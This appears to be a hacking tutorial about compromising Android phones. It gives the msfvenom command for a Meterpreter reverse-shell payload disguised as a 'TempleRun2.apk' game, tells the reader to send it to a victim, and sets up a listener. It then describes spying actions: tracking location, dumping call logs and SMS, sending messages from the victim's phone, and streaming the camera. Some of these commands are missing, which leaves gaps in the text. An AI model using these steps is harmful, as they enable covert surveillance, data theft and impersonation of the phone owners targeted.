In 2015 we were using msfpayload and msfencode tools to perform this hack but on June 8th 2015 both msfpayload and msfencode is replaced by msfvenom tool. So simply now msfvenom is an updated combination of Msfpayload and Msfencode tool
Now by using msfvenom we will create meterpreter payload for android.
Open you Kail Linux terminal and type:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 >/root/Desktop/TempleRun2.apk
Now it will automatically generate the malicious but interesting to install apk files and store it to your Kali Linux desktop.
Send this TempleRun2.apk file to victim mobile, as soon as they open and install it you will get access of victim android mobile.
Now we have to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
Go to your Kali Linux terminal and type: msfconsole
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.102
set lport 4444
Now you are in victim android mobile from here you can do many things like:
To check whether victim mobile is rooted or not for this type following command:
Check victim’s mobile exact location type:
it will show the exact location of victim mobile on Google maps
To download victim call logs from their mobile type:
It will download and store txt file of call logs in your root directory
To download sms dump type:
it will also download and store txt file of sms dump in your root directory
To send sms from hacked android mobile phone to someone else type:
send_sms -d “number of the person whom you want to send sms” -t “message you want send”
ex: send_sms -d 9599***847 -t hacked
To capture pic from victim’s mobile camera type:
it will provides you a list of all webcams on the victim mobile then select from the list and type:
to stream live feed from victim’s mobile camera type:
it will automatically open up a browser and you will see live feed from their camera
Author: Akshay Bhardwaj Security Enthusiast and Researcher, Sketch Artist and Technical writer at hackingarticles.in